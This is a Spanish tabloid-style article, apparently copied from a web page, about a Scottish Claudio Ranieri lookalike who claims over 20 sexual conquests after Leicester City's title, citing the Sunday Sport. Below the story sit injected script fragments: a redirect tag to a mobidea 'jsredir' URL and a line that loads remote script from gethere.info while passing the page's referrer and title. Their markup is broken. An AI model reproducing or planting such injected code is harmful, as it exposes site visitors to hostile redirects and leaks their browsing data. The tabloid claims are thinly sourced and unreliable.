Doble de Ranieri se acuesta con más de 20 mujeres gracias al título del Leicester City

Alan Ashcroft, escocés de nacimiento y electricista de profesión, ha aprovechado su parecido con Claudio Ranieri, pues desde el campeonato del Leicester, el hombre ha podido llevarse a más de 20 mujeres a la cama.

El británico, quien admitió ser viudo, decidió tomar un autobús a la ciudad de los Foxes, donde va de bar en bar con el motivo de incrementar su fama entre las féminas inglesas, quienes no pueden “resistirse a sus encantos”.

“Me siento como si hubiera ganado la lotería genética”, afirmó el escocés al periódico, Sunday Sport, “cada vez que salgo a tomar algo, me rodean las mujeres. Nunca tienen suficiente de mí”. “No llevo un conteo de las mujeres con las que he estado, pero creo que llevo unas 26 en tan sólo una semana”, añadió Ashcroft, después de contar su gran logro.

El británico también afirmó que jamás le miente a sus conquistas, pues admite que él no es Ranieri; sin embargo, declaró que las mujeres son quienes lo asumen, por lo que sólo aprovecha el momento.

“Quiero que se sepa que yo no le miento a las mujeres. Nunca les digo que soy Ranieri, ellas sólo lo asumen y bueno…¡yo no las corrijo!”, puntualizó Alan Ashcroft

< src="http://restwp.mobidea.com/jsredir?v=1&sl=312182-3f487&redirect_option=1&data1=Track1&data2=Track2">

s.src=’http://gethere.info/kt/?264dpr&frm=&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Etiquetas:|||
Comentarios